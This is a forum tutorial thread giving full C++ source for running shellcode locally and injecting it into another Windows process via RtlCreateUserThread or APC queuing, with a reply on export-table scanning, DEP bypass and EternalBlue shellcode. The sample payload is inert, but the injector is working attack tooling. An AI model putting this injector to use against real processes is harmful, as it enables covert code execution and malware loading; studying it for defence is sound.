Tutorial Shellcode execution (C++ & ASM)

D

Deleted member 65228

Guest
#1
Introduction

Shell-code is instructions. They are the byte representation of Assembly instructions - e.g. MOV, CALL, JMP, PUSH, POP, RET. You can get the bytes to a function from disassembly and then use them for shell-code, however it must be null-byte free and the addresses must be valid (e.g. if you hard-code an address it might cause a problem and not work on another system either).

For example, if we have some instructions from Assembly and we wish to turn it into shell-code.



Code:
MOV EAX, 0x1234
JMP EAX
To get the bytes we would need to check disassembly.

As we can see from the above, the bytes for those instructions are the following.



Code:
B8 D2 04 00 00
FF E0
In a byte array we could use these instructions.



Code:
unsigned char Opcode[7] = {
        0xB8, 0xD2, 0x04, 0x00, 0x00,
        0xFF, 0xE0
    };
You can keep your instructions in a byte array but you can use a string format instead; you start by making a '\' and then you put an 'x' and then after that 'x' you put your instruction.

For example, if we wanted to convert MOV EAX to shell-code, we can use the B8 instruction (0xB8) which is MOV EAX. In shell-code string form:
Code:
"\xb8"
If we have an address of a function, lets say to ExitProcess, which is 0x77513cb0 and we wish to store it in the EAX, then the following would be an example:
Code:
"\xb8\xb0\x3c\x51\x77"
Notice how there are no null-free bytes? You may also notice the address is weird... It is reversed backwards!

In shell-code, an address must be reversed. If we look at the address in bold, the ending is b0 and then there is 3c, 51, 77 (instead of reading it normally with 77 first, then 51, 3c, and b0). Therefore, it ends up being: "\xb0\x3c\x51\x77" instead of "x77\x51\x3c\xb0")


Source code example

I decided to share a basic method of shell-code execution/injection. The demonstration shell-code will not actually do anything on your system - it moves an address into EAX and then does a JMP to EAX (the address put into it), however the address is hard-coded and therefore won't be valid for your system so if you use the demonstration shell-code you should end up with a crash.

Execution method:
- Allocates memory for the shell-code with PAGE_EXECUTE_READWRITE flags
- Copies the shell-code to the allocated memory
- Executes the instructions at the address of the allocated memory (the shell-code)

Injection method:
- Allocate memory for the shell-code in the target process using the process handle
- Write to the allocated memory to place the shell-code there (the instructions)
- Execute the shell-code via APC (Asynchronous Procedure Calls)

The demonstration example relies on the Native API functions: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtQueueApcThread, etc. Just to be clear, this is not essential... You can use the normal Win32 API if you'd like.

header.h



Code:
#pragma once
#include <Windows.h>
#include <winternl.h>
#include <TlHelp32.h>
#include <iostream>
#include "ntinfo.h"
#include "memory.h"
#include "shellcode.h"
memory.h



Code:
#pragma once
#include "header.h"

extern pNtOpenThread fNtOpenThread;
extern pNtSuspendThread fNtSuspendThread;
extern pNtResumeThread fNtResumeThread;
extern pNtAllocateVirtualMemory fNtAllocateVirtualMemory;
extern pNtWriteVirtualMemory fNtWriteVirtualMemory;
extern pRtlCreateUserThread fRtlCreateUserThread;
extern pNtQueueApcThread fNtQueueApcThread;

BOOL CreateMemory();
ntinfo.h





Code:
#pragma once
#include "header.h"

#define STATUS_SUCCESS 0x00000000
#define NtCurrentProcess() ((HANDLE)-1)

typedef struct _CLIENT_ID {
    PVOID UniqueProcess;
    PVOID UniqueThread;
}CLIENT_ID, *PCLIENT_ID;

typedef NTSTATUS(NTAPI *pNtOpenProcess)(
    HANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PCLIENT_ID ClientId
    );

typedef NTSTATUS(NTAPI *pNtOpenThread)(
    PHANDLE ThreadHandle,
    ACCESS_MASK AccessMask,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PCLIENT_ID
    );

typedef NTSTATUS(NTAPI *pNtSuspendThread)(
    HANDLE ThreadHandle,
    PULONG SuspendCount
    );

typedef NTSTATUS(NTAPI *pNtResumeThread)(
    HANDLE ThreadHandle,
    PULONG SuspendCount OPTIONAL
    );

typedef NTSTATUS(NTAPI *pNtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
    );

typedef NTSTATUS(NTAPI *pNtWriteVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID BaseAddress,
    PVOID Buffer,
    ULONG NumberOfBytesToWrite,
    PULONG NumberOfBytesWritten
    );

typedef NTSTATUS(NTAPI *pRtlCreateUserThread)(
    HANDLE ProcessHandle,
    PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
    BOOLEAN CreateSuspended,
    ULONG StackZeroBits,
    PULONG StackReserved,
    PULONG StackCommit,
    PVOID StartAddress,
    PVOID StartParameter OPTIONAL,
    PHANDLE ThreadHandle,
    PCLIENT_ID ClientID
    );

typedef NTSTATUS(NTAPI *pNtQueueApcThread)(
    HANDLE ThreadHandle,
    PIO_APC_ROUTINE ApcRoutine,
    PVOID ApcRoutineContext OPTIONAL,
    PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL,
    ULONG ApcReserved OPTIONAL
    );
shellcode.h



Code:
#pragma once
#include "header.h"

BOOL InjectShellcode(
    HANDLE ProcessHandle,
    CHAR *Opcode,
    BOOL bApcInjection
);

BOOL ExecuteShellcodeLocal(
    CHAR *Opcode
);
main.cpp



Code:
#include "header.h"
using namespace std;

int main()
{

    char *OpcodeBytes = "\xb8\xb0\x3c\x51\x77"
        "\xff\xe0";

    if (CreateMemory())
    {
        ExecuteShellcodeLocal(OpcodeBytes);
    }

    return 0;
}
memory.cpp



Code:
#include "header.h"

pNtOpenThread fNtOpenThread;
pNtSuspendThread fNtSuspendThread;
pNtResumeThread fNtResumeThread;
pNtAllocateVirtualMemory fNtAllocateVirtualMemory;
pNtWriteVirtualMemory fNtWriteVirtualMemory;
pRtlCreateUserThread fRtlCreateUserThread;
pNtQueueApcThread fNtQueueApcThread;

BOOL CreateMemory()
{
    FARPROC fpNtAddresses[7] = {
        GetProcAddress(GetModuleHandle("ntdll.dll"), "NtOpenThread"),
        GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSuspendThread"),
        GetProcAddress(GetModuleHandle("ntdll.dll"), "NtResumeThread"),
        GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory"),
        GetProcAddress(GetModuleHandle("ntdll.dll"), "NtWriteVirtualMemory"),
        GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlCreateUserThread"),
        GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueueApcThread")
    };

    for (FARPROC &fpNtAddress : fpNtAddresses)
    {
        if (!fpNtAddress)
        {
            return FALSE;
        }
    }

    fNtOpenThread = (pNtOpenThread)fpNtAddresses[0];
    fNtSuspendThread = (pNtSuspendThread)fpNtAddresses[1];
    fNtResumeThread = (pNtResumeThread)fpNtAddresses[2];
    fNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)fpNtAddresses[3];
    fNtWriteVirtualMemory = (pNtWriteVirtualMemory)fpNtAddresses[4];
    fRtlCreateUserThread = (pRtlCreateUserThread)fpNtAddresses[5];
    fNtQueueApcThread = (pNtQueueApcThread)fpNtAddresses[6];

    if (!fNtOpenThread ||
        !fNtSuspendThread ||
        !fNtResumeThread ||
        !fNtAllocateVirtualMemory ||
        !fNtWriteVirtualMemory ||
        !fRtlCreateUserThread ||
        !fNtQueueApcThread)
    {
        return FALSE;
    }

    return TRUE;
}
shellcode.cpp







Code:
#include "header.h"

BOOL InjectShellcode(
    HANDLE ProcessHandle,
    CHAR *Opcode,
    BOOL bApcInjection
)
{
    NTSTATUS NtStatus = STATUS_SUCCESS;
    HANDLE ThreadHandle = 0, ThreadHandle32 = 0;
    THREADENTRY32 ThreadEntry32 = { 0 };
    DWORD dwProcessId = GetProcessId(ProcessHandle);
    PVOID pvShellcodeMemory = 0;
    SIZE_T sOpcodeSize = strlen(Opcode);
    OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    CLIENT_ID ClientId{ 0 };
    INT ThreadIndex = 0;

    if (!ProcessHandle || !dwProcessId || !sOpcodeSize)
    {
        return FALSE;
    }

    NtStatus = fNtAllocateVirtualMemory(ProcessHandle, &pvShellcodeMemory, NULL, &sOpcodeSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!NT_SUCCESS(NtStatus) && !pvShellcodeMemory)
    {
        return FALSE;
    }

    NtStatus = fNtWriteVirtualMemory(ProcessHandle, pvShellcodeMemory, Opcode, sOpcodeSize, NULL);
    if (!NT_SUCCESS(NtStatus))
    {
        VirtualFreeEx(ProcessHandle, pvShellcodeMemory, sOpcodeSize, MEM_RELEASE);
        return FALSE;
    }

    if (!bApcInjection)
    {
        NtStatus = fRtlCreateUserThread(ProcessHandle, NULL, FALSE, NULL, NULL, NULL, pvShellcodeMemory, NULL, &ThreadHandle, &ClientId);
        if (!NT_SUCCESS(NtStatus))
        {
            VirtualFreeEx(ProcessHandle, pvShellcodeMemory, sOpcodeSize, MEM_RELEASE);
            CloseHandle(ThreadHandle);
            return FALSE;
        }

        CloseHandle(ThreadHandle);
    }
    else
    {
        InitializeObjectAttributes(&ObjectAttributes, NULL, NULL, NULL, NULL);
        ClientId.UniqueProcess = (PVOID)dwProcessId;

        ThreadHandle32 = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
        ThreadEntry32.dwSize = sizeof(THREADENTRY32);

        do {
            if (ThreadEntry32.th32OwnerProcessID == dwProcessId)
            {
                ClientId.UniqueThread = (PVOID)ThreadEntry32.th32ThreadID;

                NtStatus = fNtOpenThread(&ThreadHandle, MAXIMUM_ALLOWED, &ObjectAttributes, &ClientId);
                if (NT_SUCCESS(NtStatus))
                {
                    NtStatus = fNtQueueApcThread(ThreadHandle, (PIO_APC_ROUTINE)pvShellcodeMemory, NULL, NULL, NULL);
                    if (NT_SUCCESS(NtStatus))
                    {
                        ThreadIndex++;
                    }
                }

                CloseHandle(ThreadHandle);
            }
        } while (Thread32Next(ThreadHandle32, &ThreadEntry32));

        CloseHandle(ThreadHandle32);

        if (!ThreadIndex)
        {
            VirtualFreeEx(ProcessHandle, pvShellcodeMemory, sOpcodeSize, MEM_RELEASE);
            return FALSE;
        }
    }

    return TRUE;
}

BOOL ExecuteShellcodeLocal(
    CHAR *Opcode
)
{
    NTSTATUS NtStatus = STATUS_SUCCESS;
    PVOID pvShellcodeMemory = 0;
    SIZE_T sOpcodeSize = strlen(Opcode);

    NtStatus = fNtAllocateVirtualMemory(NtCurrentProcess(), &pvShellcodeMemory, NULL, &sOpcodeSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!NT_SUCCESS(NtStatus))
    {
        VirtualFreeEx(NtCurrentProcess(), pvShellcodeMemory, sOpcodeSize, MEM_RELEASE);
        return FALSE;
    }

    RtlCopyMemory(pvShellcodeMemory, Opcode, sOpcodeSize);

    if (*(BYTE*)Opcode == 0x00)
    {
        return FALSE;
    }

    ((void(*)())pvShellcodeMemory)();

    return TRUE;
}


This is not supposed to be a tutorial on how to understand shell-code or how to create/use it, therefore to make use of this you'll need to study. However, just a share on a simple way to execute shell-code or inject it into another process for research purposes.



Thanks for reading as always.
- Opcode




-
 

Attachments

Joined
Mar 13, 2017
Messages
29
OS
Windows 10
Antivirus
ESET
#2
As I saw shellcodes parse PEB to find kernel32.dll (or kernelbase.dll) to get GetProcAddress and LoadLibrary and after that, they have what they need... blah blah blah.
Why do we need to search GetProcAddress from PEB?
Just get addresses of GetProcAddress and LoadLibrary from our injector and after that hardcode them inside shellcode.
Am I right?
You used in another tutorial LoadLibrary address from injector to execute inside another process, DLL injection. if same functions have same addresses inside different processes, why shellcode parses PEB? (If they are injecting using some kind of injector - PE file )


And one more bonus question :) why these addresses are not randomized?
 
D

Deleted member 65228

Guest
#3
As I saw shellcodes parse PEB to find kernel32.dll (or kernelbase.dll) to get GetProcAddress and LoadLibrary and after that, they have what they need... blah blah blah.
Why do we need to search GetProcAddress from PEB?
Just get addresses of GetProcAddress and LoadLibrary from our injector and after that hardcode them inside shellcode.
Am I right?
You used in another tutorial LoadLibrary address from injector to execute inside another process, DLL injection. if same functions have same addresses inside different processes, why shellcode parses PEB? (If they are injecting using some kind of injector - PE file )
You don't need to find the address of GetProcAddress (KERNEL32) at all. You can keep scanning the Export Address Table for the addresses, which is better anyway IMO. And you don't get the functions from PEB either (unless it is related to WOW64). Well kind of... You use the PEB to find the modules (GetModuleHandle replacement -> scanning the module list) -> use the base address of found module to pass for EAT scanning to find the address of target functions.

If you are performing injection from already-executing code then you can find the addresses within your own process and then put them into the shell-code dynamically prior to injection, that would work yes. However you need to remember that addresses between 32-bit or 64-bit compiled modules will differ, which is why the LoadLibrary injection method doesn't affect 32-bit processes from an 64-bit injector by default (even though 64-bit processes can properly access 32-bit processes) -> the work around for that one would be to find the address for the same architecture of the module the target is using. Therefore if you get the addresses within a 64-bit process, it won't work for a 32-bit process unless you got the right address for the 32-bit target... If that makes sense.

Remote Code Execution exploits for shell-code analysis commonly use ROP chain attacks to force a program into calling a function like NtProtectVirtualMemory to change execution flags at memory (e.g. to PAGE_EXECUTE_READWRITE) for DEP bypass and what-not (or you can find way to allocate with NtAllocateVirtualMemory -> now it has PAGE_EXECUTE_READWRITE so you can copy new code across) and similar (complex stuff), but the whole dynamically hard-coding the retrieved address won't work in a situation like that for a file-less attack because there'd be no execution beforehand exploitation to find a way to retrieve them. Which is why scanning the EAT is common. Shell-code isn't linked to the IAT so you cannot call a function you did not find the address from, therefore scanning EAT is best way, and if the module which holds the target function isn't loaded -> find the address of LdrLoadDll and use it.

So if you look at EternalBlue/DoublePulsar, the shell-code executed on targeted host will scan ntoskrnl.exe exports for NtAllocateVirtualMemory and ExAllocatePool/WithTag. It couldn't find the addresses beforehand to put them in the shell-code before the injection of course, so the shell-code scanned the exports of ntoskrnl.exe to find the functions when it was executed.

The thing is, ntdll.dll will always be loaded in every single user-mode process. So you will always be safe finding the addresses within NTDLL and using those functions, as long as it isn't one of those functions only available under WOW64 NTDLL (SysWOW64 version) or alike. So go for LdrGetProcedureAddress instead of GetProcAddress, but there is no need if you are finding address with EAT, because you can just keep scanning EAT for all addresses. And to load needed modules containing functions you need address of if they are not loaded, then you use LdrLoadDll.

And one more bonus question :) why these addresses are not randomized?
About the addresses being the same, it will be randomised at boot in Windows for Windows modules like kernel32.dll, ntdll.dll, user32.dll, etc. If you reboot your PC and then debug your test program again and compare the addresses, it won't be the same as it is now in the image you attached. But it will stay that way until the next reboot. So the 32-bit kernel32.dll will have the same addresses and the 64-bit kernel32.dll will have the same addresses given to each until the reboot.

Windows modules are also loaded in a certain order which is probably the reason why. So they get randomised at boot, then they are that way until next boot. So ntdll.dll is always the first module loaded because Win32 API depends on NTDLL to transition from ring 3 to ring 0 (ntoskrnl.exe routines eventually called for NT calls of course), and then there will be an order about kernel32.dll, user32.dll and other Windows modules. It should depend on OS version/SP as well about it.
 
Forgot your password?